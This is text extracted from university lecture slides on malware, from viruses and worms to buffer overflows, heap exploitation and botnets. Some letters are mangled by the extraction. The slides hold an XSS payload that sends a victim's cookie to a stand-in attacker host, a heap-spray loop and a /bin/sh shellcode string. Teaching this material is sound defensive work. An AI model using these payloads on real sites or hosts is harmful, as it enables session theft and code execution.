malware’dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf ·...
TRANSCRIPT
Malware
Reading Material
• Ken Thompson and Trojans – h6p://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-‐thompson.pdf
• Worm Anatomy and Model h6p://portal.acm.org/citaGon.cfm?id=948196
• Smashing the Stack for Fun and Profit h6p://insecure.org/sR/smashstack.html
Why Do We Care?
• SANS Top 20 Internet Security VulnerabiliGes – h6p://www.sans.org/top20/
• Broad issues very similar year in and year out
Zero Day Exploit
• An exploit that has no patch available
• Time between exploit discovery and wide acGvaGon shrinking
• Malware developer has trade-‐off in launch tacGcs – Big splash but faster discovery – Reduced a6ack rate but longer undiscovered
Windows Meta File Exploit
• Exploit flaws in the Windows rendering engine enable remote code execuGon – Memory corrupGons – VisiGng web site with “bad image” causes a6ack – A6ack sold for $4,000 – h6p://www.eweek.com/arGcle2/0,1895,1918198,00.asp
• Bugtraq post in December 2005 – Probably lingering earlier – 0 day exploit
• Microsof’s response in early January 2006 – h6p://www.microsof.com/technet/security/bulleGn/ms06-‐001.mspx
Malicious Code
• Set of instrucGons that cause a site’s security policy to be violated
• Ofen leveraging an inadvertent flaw (design or implementaGon) – To propagate/install on target – To cause harm on target
Malware Summary
Code type CharacteristicsVirus Attaches itself to program and copies to other programsTrojan Horse Contains unexpected, additional funtionalityLogic Bomb Triggers action when condition occursTime Bomb Triggers action when specified time occursTrapdoor Allows unauthorized access to functionalityWorm Propagates copies of itself through a networkRabbit Replicates itself without limit to exhaust resourcesNetbot Trapdoor programs orchestrated through control channel (IRC)Root Kit Hooks standard OS calls to hide data
Trojan Horses
• Seemingly useful program that contains code that does harmful things – Perform both overt and covert acGons
• Frequently embedded in applets or games, email a6achments
• Trojan horse logins, spoof authenGcaGon or webpage forms
Thompson's Trojan Compiler
• Detect it is compiling “login” program – Add “bug” to accept fixed password
• Problem: – Easily seen in code review
• SoluGon: – Add second bug acGvated when compiling compiler itself
– Then remove bugs from source
Key Loggers and Spyware
• Gather informaGon from computer – Send back to the central office
• From key loggers can gather – Passwords – ConfidenGal communicaGon – Keep track of your kids/employees
• From spyware can gather – Web browsing habits – Gather markeGng informaGon
Rootkits
• Insert file filters to cause files or directories disappear from normal lisGngs – Can replace Windows API pointers (user mode) – Can also replace syscall table pointers
• Both require privilege, but most Windows installs require privilege anyway – The power of extensibility used for the dark side
• Techniques apply equally well to Linux and Mac
Sony Player DRM and Rootkits
• Bad press for Sony 2005 – Mark Russinovich's original observaGons h6p://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-‐rootkits-‐and-‐digital-‐rights-‐management-‐gone-‐too-‐far.aspx#comments
– A Gmeline • h6p://www.boingboing.net/2005/11/14/sony_anGcustomer_te.html
• To ensure that copy protecGon is not evaded install rootkit to hide the protecGon code – Available for other a6ackers to use – Uninstallable – Uses CPU and memory – Not adequately noted in EULA
Virus OperaGon
• Virus Phases: – Dormant: WaiGng on trigger event – PropagaGon: ReplicaGng to programs/disks – Triggering: By event to execute payload – ExecuGon: ExecuGng payload
• Details usually Machine/OS specific – Exploits different features or weaknesses
Virus Pseudocode
• beginvirus: • If spread-‐condiGon then begin – For some set of target files do begin
• If target is not infected then begin – Determine where to place virus instrucGons
– Copy instrucGons from beginvirus to endvirus into target
– Alter target to execute new instrucGons
• Perform some acGons • Goto beginning of infected program
• endvirus:
Virus A(achment
• A Virus can a6ach itself to a program or to data by – Appending itself to either the beginning or end of either source code
or assembly, so it is acGvated when the program is run – Integrate itself into the program, spread out code – Integrate into data: executable text macro, scripGng – Macros and email a6achments
• An acGvated virus may: – Cause direct or immediate harm – Run as a memory resident program (TSR, daemon, or service) – Replace or relocate boot sector programs, start at system start-‐up
Macro Viruses
• Macro code a6ached to some data file – Interpreted rather than compiled – PlaRorm independent
• Interpreted by program using the file – E.g., Word/Excel macros – Esp. using auto command and command macros – Ofen automaGcally invoked
• Blurs disGncGon between data and program files making task of detecGon much harder
• Classic trade-‐off: “ease of use” vs “security”
Email Viruses
• Spread using email with a6achment containing a macro virus – Melissa, LoveBug
• Triggered when user opens or executes a6achment – Also when mail viewed by using scripGng features in mail agent
– Usually targeted at Microsof Outlook mail agent and Word/Excel documents, Microsof IIS
Basic PrecauGons
• Don’t import untrusted programs
– Who can you trust? – Viruses have been found in commercial shrink-‐wrap sofware
– Standard download sites have been corrupted • Check MD5 hashes
• Scan for viruses, install anG-‐virus sofware • Update anG-‐virus sofware regularly
Signature Scanning
• Early viruses had characterisGc code pa6erns known as signatures
• Create a database of pa6erns, search files for pa6erns (McAffee)
• Use data-‐mining, learning, feature extracGon etc. to look for disguised or obfuscated pa6erns
• Can only scan for known signatures
Signature Avoiding Viruses
• Polymorphic Virus produces varying but operaGonal copies of itself – Use alternaGve but equivalent instrucGons – Gets around signature scanners. Whale virus, 32 variants
• Stealth Virus acGvely tries to hide all signs of its presence – A virus can intercept calls to read a file and return correct values about file sizes etc.
Another Signature Avoiding Virus
• Encrypted Virus stores bulk of self encrypted – Small decrypt rouGne in clear – Key stored in clear
Worms
• Propagate from one computer to another
• Viruses use email/infected media to propagate to so differenGaGon is fuzzy
The Morris Worm Incident
• How 99 lines of code brought down the Internet (ARPANET actually) in November 1988.
• Robert Morris Jr. Ph.D student, Cornell, wrote a program that could: – Connect to another computer, and find and use one of several vulnerabiliGes
(buffer overflow in fingerd, password cracking etc.) to copy itself to that second computer.
– Begin to run the copy of itself at the new locaGon. – Both the original code and the copy would then repeat these acGons in an
infinite loop to other computers on the ARPANET (mistake!) • Morris was sentenced to three years of probaGon, 400 hours of
community service, and a fine of $10,050. He is now a Professor at MIT. • Worms have go6en bigger and more aggressive
Worm Phases
• Dormant
• PropagaGon – Search for other systems to infect – Establish connecGon to target remote system
– Replicate self onto remote system • Triggering • ExecuGon
Who to target?
• Scanning – Currently generally used – Select random addresses • Mix of addresses in current network (local computers probably have similar vulnerabiliGes) and remote networks
– No longer feasible in IPv6 • 32 bit vs 128 bit address space
Viruses and Worms in IPv4
• Slammer infected most of the IPv4 Internet in 10 minutes (75,000 hosts infected in one-‐half hour)
Source caida.org
Worms in IPv6
• Address space is 2^128 instead of 2^32 – Random address selecGon will not work
• Say ¼ of address in IP4 network run Windows – 1 in 4 chance of finding a target with each probe
• Spread that among 2^128 addresses – 1 in 2^98 chances of finding a viable target
Other Techniques to Find Targets
• InteresGng Papers – How to 0wn the Internet…
h6p://www.icir.org/vern/papers/cdc-‐usenix-‐sec02/ – Top speed of flash worms
h6p://vividmachines.com/papers/topspeed.pdf
• Hitlist Scanning – Stealthy scans (randomized, over months), distributed scanning,
• DNS searches, Spiders (Code red, crawls for high connecGvity), listening on P2P networks, public lists
• PermutaGon scanning (divide up IP address space) • Warhol worm-‐ Hit list + permutaGon
Network PropagaGon
• Send small number of packets to reduce detecGon
• UDP packets – No ACK needed, so can spoof source address
• Connect to vulnerable network services – Generally exercise buffer overflow – Launch shell
• Running at high privilege (ideal) • Or use as foothold to mount other a6acks to gain privilege
• Or use as a6ack launch point
Worm Examples
• Morris Worm • Code Red – Exploited bug in MS IIS to penetrate and spread – Probes random IPs for systems running IIS – Had trigger Gme for denial-‐of-‐service a6ack – 2nd wave infected 360000 servers in 14 hours
• Code Red 2 -‐ trapdoor, for remote control • Nimda -‐ used mulGple infecGon mechanisms, email, file-‐sharing, web-‐client, IIS, Code Red 2 backdoor
A6acks through browsers
32
HTML is stateless
• Each interacGon of a client with server has no memory, at least as far as the protocol is concerned
• Session state is created by server, wriGng a “cookie” into a document as part of the header, saved by the client’s browser
• May contain anything the server wishes to record, e.g. – Password, account number, idenGty, shopping cart
– Most typically a session ID
• Cookie is returned by the browser with every access to the server
33
How cookies work From the client to the
server, something like
With a response (to set a cookie) like
Browser understands to include cookie with every subsequent GET, e.g.
34
Cookie tells server the second request is related to the first
Other cookie a6ributes include domain, path, expiraGon date
Abuse of Cookies
• “Cookie hijacking” – Unencrypted cookie value sniffed off network, HTTP session is “hijacked” by outsider who has credenGals the cookie represents
• “Cookie Thef”, more subtle, done remotely – Track behaviors – Reveal idenGty – Steal and abuse idenGty
• Access to cookies achieved using Javascript
35
Javascript
• Programming language designed to make web pages “dynamic”, e.g., – Format checking of web form entries
– Pop open a new window – Changing images as cursor passes over specific regions of the page
• Executed within a browser (“client-‐side”) – Can be embedded in page obtained from server – Interacts with elements of the page (“Document Object Model”, or DOM) • Includes data, javascript can get the value of a cookie
36
Document Object Model
• A script bound to a page has a “DOM” model of that page
• Can pass informaGon back to the server, or a different web-‐site altogether
• So we have a powerful programming language in a web page that can get to sensiGve informaGon and send it elsewhere – Think maybe there’s potenGal for a problem here?
37
ProtecGon 101 A browser concurrently manages mulGple pages from mulGple
origins
– Each has its own document elements, including cookies The “Same Origin Policy” prevents a document or script from
one site of origin from manipulaGng or communicaGng with one from a different origin – But allows coordinaGon for pages “within” same origin, e.g., scripts can “see” other pages, including their cookies
“Origin” here refers to (domain name, port, protocol) of site, see below
38
The security assumpGon
Under the Same Origin Policy, the client browser trusts any script it receives from the server to access any cookie bound to any page in the same domain because it trusts the server
Should it?
Frequently a server will just reflect back input from a client
39
Example of ReflecGng Input
40
Query
Response
The client might send a script!
A cross site scrip4ng (XSS) vulnerability exists at a server if it reflects back a script that is then executed at the client
But what’s the problem? A client a6acks herself?
Watch this….
41
XSS A6ack • Suppose
– www.bob.com has an XSS vulnerability – Alice visits www.bob.com a lot
• She logs in, www.bob.com returns a session ID cookie
– Eve knows about the vulnerability and sends Alice an email with an evil link (containing an a6ack script) • Or embedded in a CSS header with HTML forma6ed
email. Alice only has to OPEN the message!
42
www.bob.com
login
cookie:session ID
www.bob.com
h6p://host/a.php?variable="><script>document.locaGon='h6p://www.witch.com/cgi-‐bin/get.cgi? '%20+document.cookie</script>
XSS A6ack : Cookie Thef
• Directed at server • Embedded Script • Transmission to www.witch.com • Alice’s cookie
43
www.bob.com
cookie:session ID
h6p://www.bob.com/a.php? variable="><script>document.locaGon='h6p://www.witch.com/cgi-‐bin/get.cgi? '%20+document.cookie</script>
XSS A6ack : Cookie Thef
• Click evil URL
44
www.bob.com
cookie:session ID
…<script>… Reflected back
• Script takes permissions of Alice’s page on www.bob.com
www.bob.com
cookie:session ID
• Script executes
www.witch.com
cookie:session ID
cookie:session ID
• With Alice’s session ID, Eve can impersonate Alice, obtain sensiGve informaGon from her account on www.bob.com
Other XSS a6acks
BulleGn Board PosGngs
– some permit user inclusion of HTML Mashups
– Web sites that integrate interacGng components from mulGple sources, e.g., hotel lisGng with maps.google.com at the side or adverGsements in Facebook
Mashups work around Same Origin Policy
If a Mashup framework is vulnerable to XSS, then a malicious component can inject code
– e.g. a paid-‐for web adverGsement
45
Mashups
If a Mashup framework is vulnerable to XSS, then a malicious component can inject code (e.g. adverGsement)
46
A6acks through memory
47
Outline
Typical a6ack through memory is comprised of several parts – Find an applicaGon with a memory vulnerability • Browsers, internet service apps, Adobe Reader…
– Find a way of a controled overwrite of a criGcal piece of memory • Usually to get the computer to execute a6acker’s code
– Find a way of ge�ng a6acker’s code in memory – Trigger vulnerability with carefully crafed a6ack input
48
Let’s start at the very beginning
“Von Neumann” computers store programs in memory, along with data
Modern computers use dedicated registers to “point” at key locaGons
49
Program Counter (PC) Stack Pointer (SP)
An “instrucGon” is read out from The memory locaGon given by the PC, and interpreted by the control Unit
• the PC is increased to point to the next instrucGon • the “stack” is dynamically changing scratch space
Memory OrganizaGon
Virtual memory -‐-‐-‐ hardware translaGon of logical address space to physical : every process “sees” the whole memory for itself
50
Memory parGGoned in to different segments with different roles • Kernel • Text (instrucGons) • IniGalized data • UniniGalized data • Dynamically allocated • Stack • heap
Jumping around
The PC advances linearly, except when it is explicitly loaded – To branch on a condiGonal instrucGon – To “jump” to a subrouGne – To “return” from a subrouGne – To handle an excepGon – To select the implementaGon of a “virtual funcGon”
In all but the first of these cases, the value loaded into the PC is found explicitly in memory. – A memory a6ack consists of changing that value to point to some code the a6acker managed to get into the memory
51
Primer on subrouGnes
A subrouGne is a modular block of code
– The program “calls” via a special CPU instrucGon • PC is loaded with the subrouGne address
– The subrouGne “returns” to the instrucGon afer the calling point, via a special CPU instrucGon • The address loaded into the CPU is on the “stack”
52
Stack Dynamics • Each subrouGne call pushes a frame onto the stack – It is popped on return – SP moves with each stack operaGon
– Look at posiGon of “Local Variables” – Memory writes go from low address to high address – Hold that thought….
53
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null x y z empty empty
buffer In use
from to
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null x y z empty
buffer In use
from to
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null x y z empty
buffer In use
from to
from points to null? No
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null x y z
buffer In use
from to
b a
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null x y z
buffer In use
from to
b a
from points to null? No
Buffer Overflow
When a buffer is created memory, its maximum length is declared
Common operaGon : copy a string of characters, from one place in memory to another
– By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is
reached
a b c null y z
buffer In use
from to
b a
!
c
Buffer Overflow
• Most common pen-‐test security vulnerability 2003 (SANS/FBI) • One of the most serious classes of security threats
– An a6acker can gain parGal or complete control of a host
• Buffer (array or string): space in which data can be held • A buffer’s capacity is finite:
– char sample[10]; – sample[10] = ’A’;
• Buffer sizes do not have to be predefined. Out-‐of-‐bounds error
60
Effects of Buffer Overflow
• A program that fails to check a buffer overflow may allow vital code or data to be overwri6en
• A buffer may overflow into and change: – User’s own data structures – User’s program code – System data structures
– System program code
• Most common a6ack is to subvert the funcGon of a privileged program and take control of the host
61
Old School : Stack Smashing
• A6acker overflows stack allocated variable to corrupt the return address
• Also called Stack Smashing A6ack. – Formerly most common buffer-‐overflow a6ack, now largely miGgated
• Rewrite return address or frame pointer with a6ack code, or rewrite pointer to address to “a6ack” code in user memory
• On return execuGng code in stack buffer at original program privilege – Typically a6ackers exec a shell
62
Stack smashing
SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length
63
Buffer
Stack smashing
SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length
64
A6acker data
Stack smashing
SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length
65
A6acker data
Stack smashing
SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length
66
A6acker data
Address of “shellcode”
Returning from subrouGne call loads PC with address of “shellcode” about which more, anon
Stack smashing
SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length
67
A6acker data
Address of “shellcode”
A6ack code just part of the string being copied
shellcode
Defense against stack smashing
The a6acker needs to know the memory address of his shellcode – The a6acker’s string gets loaded on to the stack, a6acker can use a debugger to figure out addresses
Defenses include
• se�ng “no execute” protecGon on stack • RandomizaGon of memory layout with each program execuGon
• StaGc and dynamic buffer bounds checking
68
The Empire Strikes Back
A6acker a6enGon moved to a6acks through memory addresses not on the stack
Stack allocaGons are temporarily, they disappear afer a subrouGne returns
The “heap” allows a program to dynamically request a block of memory, and have it stay allocated across mulGple subrouGne calls
The data segments store variables and strings that might also be subverted by an overflow
69
Example : changing a file name
• Imagine a buffer that resides just below a string that idenGfies a file
• Further imagine a program that has a buffer overflow vulnerability on “buffer”, opens the named file, and writes user supplied informaGon there
• A6ack consists of – OverwriGng buffer, replacing file name with a6acker’s choice, e.g., /etc/.rhosts
– Choosing string to write into file, e.g., an rhosts file that includes a6acker’s machine
• Observe that no subversion of control flow occurs
70
null
buffer
/ t m p / s c r a t c h
A6acks through the heap : preliminaries
Remember doubly linked lists
71
0xbcd3000
0xbcd3080
null
100
“next”
“prev”
size
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
0xbcd3080
Programs dynamically add and delete items
A6acks through the heap : preliminaries
To remove center block from list, change pointers
72
0xbcd3000
0xbcd3080
null
100 size
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
0xbcd3080 “next”
“prev”
A6acks through the heap : preliminaries To remove center block from list, change pointers
73
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
“next”
“prev” 0xbcd3080
A6acks through the heap : preliminaries To remove center block from list, change pointers
74
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
“next”
“prev” 0xbcd3080
A6acks through the heap : preliminaries To remove center block from list, change pointers
75
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
“next”
“prev” 0xbcd3080
A6acks through the heap : preliminaries To remove center block from list, change pointers
76
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
“next”
“prev” 0xbcd3080
A6acks through the heap : preliminaries To remove center block from list, change pointers
77
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
“next”
“prev”
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
A6acks through the heap : preliminaries To remove center block from list, change pointers
78
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
“next”
“prev”
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
OBSERVE : header has target address, AND value to load
A6acks through the heap : preliminaries To remove center block from list, change pointers
79
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
0xbcd4000
0xbcd3000 80
null
Variable “hdr”
0xbcd3000
hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev
“next”
“prev”
hdr-‐>next = hdr-‐>next-‐>next
A6acks through the heap : the real deal Suppose an a6acker can corrupt the middle header
80
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
80
null
Variable “hdr”
0xbcd3000
“next”
“prev” 0xbcd3080
Jump adrs
Shellcode adrs
FuncGon ptr
User Data Object
A6acks through the heap : the real deal Suppose an a6acker can corrupt the middle header
81
0xbcd3080
null
100
0xbcd3080
32
0xbcd4000
80
null
Variable “hdr”
0xbcd3000
“next”
“prev” 0xbcd3080
Jump adrs
Shellcode adrs
Sub return FuncGon ptr
The unlinking overwrites return adrs On call to funcGon, control passed to
shellcode
User Data Object
How can headers become corrupted? • A6ack has to know how heap is managed
• A6ack code uses allocaGons/deallocaGons to get – A pointer to an object that points to the target – A pointer to an object immediately “below” the target in memory
that can be over-‐flowed
82
32
next
prev
hdr
How can headers become corrupted? • A6ack has to know how heap is managed
• A6ack code uses allocaGons/deallocaGons to get – A pointer to an object that points to the target – A pointer to an object immediately “below” the target in memory
that can be over-‐flowed
83
32
next
prev
hdr
How can headers become corrupted? • A6ack has to know how heap is managed
• A6ack code uses allocaGons/deallocaGons to get – A pointer to an object that points to the target – A pointer to an object immediately “below” the target in memory
that can be over-‐flowed
84
32
next
prev
hdr
How can headers become corrupted? • A6ack has to know how heap is managed
• A6ack code uses allocaGons/deallocaGons to get – A pointer to an object that points to the target – A pointer to an object immediately “below” the target in memory
that can be over-‐flowed
85
32
next
prev
hdr
Jump adrs
How can headers become corrupted? • A6ack has to know how heap is managed
• A6ack code uses allocaGons/deallocaGons to get – A pointer to an object that points to the target – A pointer to an object immediately “below” the target in memory
that can be over-‐flowed
86
32
next
prev
hdr
Jump adrs
Shellcode adrs
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required
• ApplicaGon code with suitable overflow vulnerability required
• Ability to allocate / deallocate heap blocks to posiGon for a6ack required
• Ability to load shellcode required • Ability to aim jump at shellcode required
Seems very tricky, but…
87
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required – A6acker can observe using debugger; this informaGon is shared in the cyber underground
88
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required • ApplicaGon code with suitable overflow vulnerability
required – “Fuzzing” an applicaGon with lots of random junk leads to a crash, post-‐mortum analysis finds where heap pointers corrupted due to overflow… a6ack found his toehold
– Fuzzing with not-‐so-‐random junk, e.g. looking for integer/floaGng point overflows • Mismatch between allocated space (too small) and data being loaded there
89
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required
• ApplicaGon code with suitable overflow vulnerability required
• Ability to allocate / deallocate heap blocks to posiGon for a6ack required – Web browsers running javascript or flash take scripts offered on webpages and run them.
– pdf documents carry scripts in their headers, readers run them immediately
90
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required • ApplicaGon code with suitable overflow vulnerability
required • Ability to allocate / deallocate heap blocks to posiGon for
a6ack required • Ability to load shellcode required – Shellcode encoded in strings wri6en into dynamically allocated memory • May be passed as part of a6ack input through web connecGon
• May be embedded in image, document, or string in a6acker’s script
91
Heap-‐based a6acks
• InGmate knowledge of how heap is managed required
• ApplicaGon code with suitable overflow vulnerability required
• Ability to allocate / deallocate heap blocks to posiGon for a6ack required
• Ability to load shellcode required • Ability to aim jump at shellcode required
– Difficult to get exactly, but there are ways…
92
State of the art in browser exploitaGon
Stack overflows : classic, but defenses have been raised
93
(Structured ExcepGon Handling)
(detect overruns before using jump address)
(a6acker has to guess at stack layout)
“Heap Feng Shui in Javascript”, Alexander SoGrov
Heap overflows
We’ve seen proof of concept, in pracGce it is hard and defenses have been raised
94
(trick shown earlier….BUSTED)
“Heap Feng Shui in Javascript”, Alexander SoGrov
What’s lef to a6ack?
• Non-‐array stack overflows – Very rare
• Use of uniniGalized variables – Stack variables – Use afer “free”
• ApplicaGon data on the heap – ApplicaGon specific memory headers – FuncGon pointers – C++ object pointers
95 “Heap Feng Shui in Javascript”, Alexander SoGrov
DefiniGve a6ack “setSlice”
• Uses heap spraying to fill browser heap with shellcode
• Overwrites applicaGon object pointer in the previous heap chunk – Here an applicaGon vulnerability is required – Hope that afer a6ack overwrites object pointer, the applicaGon actually uses that pointer!
– May just end up crashing the browser
96 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Spraying
Developed by Blazde and SkyLined, used by most browser exploits since 2004
var x = new Array(); // fill 200MB of memory with copies of NOP // slide and shellcode
for(var i = 0; i < 200; i++) { x[i] = nop + shellcode; }
97 “Heap Feng Shui in Javascript”, Alexander SoGrov
Normal heap layout
98 “Heap Feng Shui in Javascript”, Alexander SoGrov
Afer heap spraying
99 “Heap Feng Shui in Javascript”, Alexander SoGrov
FuncGon pointer overwrite
1. Spray the heap with 200MB of shellcode (and slide) 2. Overwrite a funcGon pointer with 0x0c0c0c0c (e.g.
some pointer to an excepGon handler in staGc data) 3. Arrange for the pointer to be called
100 “Heap Feng Shui in Javascript”, Alexander SoGrov
Object pointer overwrite
• Spray the heap with 200MB of shellcode, using byte 0x0c as a NOP
• Overwrite an object pointer with 0x0c0c0c0c • Call a virtual funcGon of the object
101
Pointer to table of virtual funcGon pointers is some offset from base, but is 0x0c0c0c0c
ParGcular funcGon called determines offset into vtable…but whatever it indexes to, the value there is 0x0c0c0c0c
presumed object at 0xc0c0c0c0
presumed vtable at 0xc0c0c0c0
presumed funcGon at 0xc0c0c0c0
“Heap Feng Shui in Javascript”, Alexander SoGrov
Clever but unreliable
• Heap spraying very effecGve, but setSlice exploit is not reliable
• OverwriGng applicaGon data requires a specific layout of heap chunks, not controlled in setSlice
• Need to prepare the heap state prior to the exploit
102 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Feng Shui
• The heap allocator is determinisGc
• Specific sequences of allocaGons and frees can be used to control the layout
103 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Feng Shui
• The heap allocator is determinisGc
• Specific sequences of allocaGons and frees can be used to control the layout
104 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Feng Shui
• The heap allocator is determinisGc
• Specific sequences of allocaGons and frees can be used to control the layout
105 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Feng Shui
• The heap allocator is determinisGc
• Specific sequences of allocaGons and frees can be used to control the layout
106 “Heap Feng Shui in Javascript”, Alexander SoGrov
Heap Feng Shui
• The heap allocator is determinisGc
• Specific sequences of allocaGons and frees can be used to control the layout
• Exploit requires very careful series of heap ops from Javascript….but it works….
107 “Heap Feng Shui in Javascript”, Alexander SoGrov
You promised us shellcode…
• Small piece of code used as payload in an exploit of a computer vulnerability – Needs to be in binary
• Requires a6enGon to a lot of details • Can’t have null bytes (usually passed as a string, null terminates a string)
– Gives some kind of service to the a6acker • An interacGve command “shell” • TCP/IP connecGon back to a6acker • Downloads and executes malware
– “drive-‐by downloads”
108
More on Shell Code
• Insert code to spawn a shell • Phrack arGcle discusses how to do this from first principles – Create assembly code to exec /bin/sh – Use GDB to get hex of binary code – Rework assembly as necessary to avoid internal 0’s
• Could break a6ack if strcpy is used by a6ack target • Will result in a hex string like: – “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”
109
More on shellcodes
• Local – hacker si�ng at the machine, networking not needed
• Remote – Connect-‐back : shellcode able to open TCP/IP connecGon back to a6acker
– Bindshell : shell code has to “bind” to a port and “listen” for a connecGon from the a6acker
– Socket-‐reuse : shellcode able to use an already opened network connecGon • Hard to exploit, hard to detect
– Big win if exploited code is “setuid” • Means that malware can run with root priviledges
110
Drive-‐by downloads
• In 2007 Google surveyed billions of sites, subjecGng 4.5M to scruGny – 450,000 able to launch drive-‐by downloads (only through vulnerable browsers)
– Another 700,000 capable of other compromises • Many use social engineering, “click here for ….” • A6ack code ofen hidden in parts of page not controlled
by site – Banner adverGsements, widgets (e.g. traffic counter)…these loaded from 3rd party site
– PosGng / comments in blogs (see cross-‐site scripGng)
111
Botnets
A compromised host (“zombie”) follows commands obtained from a C&C (command and control) computer
• Zombie will scan enivronment for resources-‐-‐-‐what can it be used for-‐-‐-‐and report to bot master
• Will ofen use an IRC channel, IM, or twi6er for communicaGon (to hide)
– But these become known – ReacGon has been designs that are more resilient to idenGficaGon, shutdown, C&C discovery
112
Botnet economy
• Large botnets have grown (e.g., Conficker) • Use is sold in an underground economy, e.g., to serve out
spam
113
Conficker See h6p://mtc.sri.com/Conficker
Timeline • Sept 08 : previously unknown vulnerability used in exploits (dubbed
MS08-‐67) -‐-‐-‐ malformed Remote Procedure Call in Windows requests cause buffer overflow – Affects all modern versions of Windows
• Sept 08 : Chinese hackers sell exploit for $37.80
• Oct 23 08 : Microsof issues “emergency patch”
• Nov. 22 08: Worm outbreak of Conficker reported in PC World
• Last esGmate over 12 million infecGons – Why? Patch ignored. Many bootleg copies of Windows
Conficker : How it works Exploit: • VicGm : Buffer overflow loads shellcode
– contacts infector which is running HTTP service, downloads worm
– Worm is in dynamically linked library (DLL) form, runs as a service via svchost.exe
– encrypted
– Brought up with every reboot
• Worm scans (see the CAIDA report ) – Local network scans (determine broadcast domain from network interface)
– Nearby other infected hosts -‐-‐ keeps a list of hosts it has infected, and scans the 256 hosts in the same /24 network
– Random
• Other infecGon vectors – Executes through ADMIN$ share on computers visible to NetBIOS
• DicGonary a6ack if password protected
– Places copies of self on removeable drives (e.g. USB drives), loads new vicGm when inserted through AUTORUN
Conficker : ConnecGvity Infected hosts can connect with a “master” to down-‐load new versions
– Variants A & B : • Every day generate a list of 250 randomly generated IP address
• Eight Gmes a day a6empt connecGons to a service on every one of those IP addresses
– The randomness is camoflage
– Defense a6empted : idenGfy the IP addresses in these lists that are not already
“registered”, register them (to take control), plant honeypot
• Updates on 3/6/09 and 3/17/09 loaded new version that organized infected hosts
into a botnet
• On April 1, 2009 the worm will changed behavior, checking into 500 rendezvous
points selected from pool of 50,000
– AnGcipated that “something” will happen,
– But nothing new really did
Hardware supported simple fix
The problem is that a6ack code is wri6en into the stack or heap, and can be executed from there
The idea of tagging memory with r/w/x permissions has been around a very long Gme
NX (No eXecute) bit architecture tags pages – called XD (eXecute Disabled) by Intel, XN (eXecute Never) in ARM processor
Naturally there are a6acks….to turn this feature off!
117
Buffer Overflow Defenses
• Write correct code
• Use appropriate languages • Use tools to analyze problems • Address Space RandomizaGon
• Make buffers non-‐executable – Should never need to execute code on the stack or on the heap
118
WriGng Correct Code
• Simple soluGon, but expensive!
– Performance vs. correctness – Sofware industry pracGces
• AutomaGc source-‐code analysis (limited scope)
– Super greps like RATS and FlawFinder – Embedded compiler analysis
• Audit teams, code review
119
Programming Languages
• Languages that are type-‐safe and enforce bound checks – E.g., Java, ML, Smalltalk
